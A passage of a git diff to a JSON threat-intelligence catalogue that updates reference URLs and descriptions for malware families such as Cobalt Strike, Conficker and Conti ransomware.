+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", + "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", + "https://twitter.com/GossiTheDog/status/1438500100238577670", + "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://twitter.com/VK_Intel/status/1294320579311435776", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", + "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f", + "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", + "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", + "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://www.youtube.com/watch?v=gfYswA_Ronw", "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", "https://blog.cobaltstrike.com/", - "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", - "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html", + "https://twitter.com/RedDrip7/status/1402640362972147717?s=20", + "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", + "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack", + "https://www.secureworks.com/research/threat-profiles/gold-waterfall", "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b", - "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", - "https://www.macnica.net/file/mpression_automobile.pdf", - "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", "https://www.youtube.com/watch?v=LA-XE5Jy2kU", - "https://mez0.cc/posts/cobaltstrike-powershell-exec/", - "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/", - "https://twitter.com/redcanary/status/1334224861628039169", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", - "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", - "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", "https://twitter.com/swisscom_csirt/status/1354052879158571008", "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-265a", "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://connormcgarr.github.io/thread-hijacking/", - "https://paper.seebug.org/1301/", + "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728", + "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html", "https://web.br.de/interaktiv/ocean-lotus/en/", - "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", - "https://redcanary.com/blog/getsystem-offsec/", + "https://twitter.com/alex_lanstein/status/1399829754887524354", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/", + "https://www.accenture.com/us-en/blogs/security/ransomware-hades", + "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/", + "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20", + "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://blog.macnica.net/blog/2020/11/dtrack.html", + "https://blog.group-ib.com/colunmtk_apt41", + "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear", + "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", + "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/", + "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", + "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ", + "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", + "https://401trg.com/burning-umbrella/ ", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", + "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", + "https://www.youtube.com/watch?v=6SDdUVejR2w", + "https://www.youtube.com/watch?v=y65hmcLIWDY", + "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2", + "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/", + "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/", + "https://www.malware-traffic-analysis.net/2021/09/17/index.html", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", + "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/", + "https://isc.sans.edu/diary/rss/26862", + "https://twitter.com/elisalem9/status/1398566939656601606", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a", + "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/", + "https://mez0.cc/posts/cobaltstrike-powershell-exec/", + "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations", + "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/", + "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", + "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/", + "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html", + "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf", + "https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", + "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a", + "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734", + "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", + "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html", + "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", + "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/", + "https://isc.sans.edu/diary/27308", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://paper.seebug.org/1301/", + "https://netresec.com/?b=214d7ff", + "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e", "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/", + "https://www.youtube.com/watch?v=borfuQGrB8g", "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://www.istrosec.com/blog/apt-sk-cobalt/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://community.riskiq.com/article/0bcefe76", + "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7", + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", + "https://isc.sans.edu/diary/26752", + "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/", + "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html", + "https://twitter.com/Cryptolaemus1/status/1407135648528711680", + "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", + "https://redcanary.com/blog/grief-ransomware/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts", + "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors", + "https://www.youtube.com/watch?v=GfbxHy6xnbA", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://malwarelab.eu/posts/fin6-cobalt-strike/", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://twitter.com/AltShiftPrtScn/status/1403707430765273095", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf", + "https://skyblue.team/posts/scanning-virustotal-firehose/", + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf", + "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://redcanary.com/blog/getsystem-offsec/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", + "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", + "https://zero.bs/cobaltstrike-beacons-analyzed.html", + "https://github.com/Apr4h/CobaltStrikeScan", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", + "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", + "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/", + "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://www.arashparsa.com/hook-heaps-and-live-free/", + "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html", + "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", + "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/", + "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/", + "https://isc.sans.edu/diary/rss/27618", + "https://www.youtube.com/watch?v=WW0_TgWT2gs", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", + "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/", + "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#", + "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/", + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "http://www.secureworks.com/research/threat-profiles/gold-winter", + "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/", + "https://thedfirreport.com/2021/05/12/conti-ransomware/", + "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/", + "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", "https://twitter.com/TheDFIRReport/status/1359669513520873473", "https://asec.ahnlab.com/ko/19640/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://www.cobaltstrike.com/support", "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", - "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html" + "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/" ], "synonyms": [ "Agentemis", @@ -11683,6 +13462,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html", + "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" ], "synonyms": [], @@ -11729,6 +13509,7 @@ "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon", + "https://www.youtube.com/watch?v=FttiysUZmDw", "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf" ], @@ -11799,7 +13580,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldlock", - "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html" + "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", + "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5" ], "synonyms": [], "type": [] @@ -11918,7 +13700,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", - "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" + "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf" ], "synonyms": [], "type": [] @@ -11994,9 +13777,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", - "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", + "https://www.minitool.com/backup-tips/conficker-worm.html", "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", + "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", "https://github.com/tillmannw/cnfckr", "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], @@ -12017,6 +13802,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/", "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", + "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [], @@ -12026,39 +13812,76 @@ "value": "Confucius" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti", + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://www.youtube.com/watch?v=hmaWy9QIC7c", + "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", + "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one", "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", - "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://twitter.com/AltShiftPrtScn/status/1417849181012647938", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-265a", "https://github.com/cdong1012/ContiUnpacker", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", + "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.ic3.gov/Media/News/2021/210521.pdf", + "https://thedfirreport.com/2021/05/12/conti-ransomware/", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74", + "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", + "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf", + "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://unit42.paloaltonetworks.com/conti-ransomware-gang/", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked", + "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/", "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", - 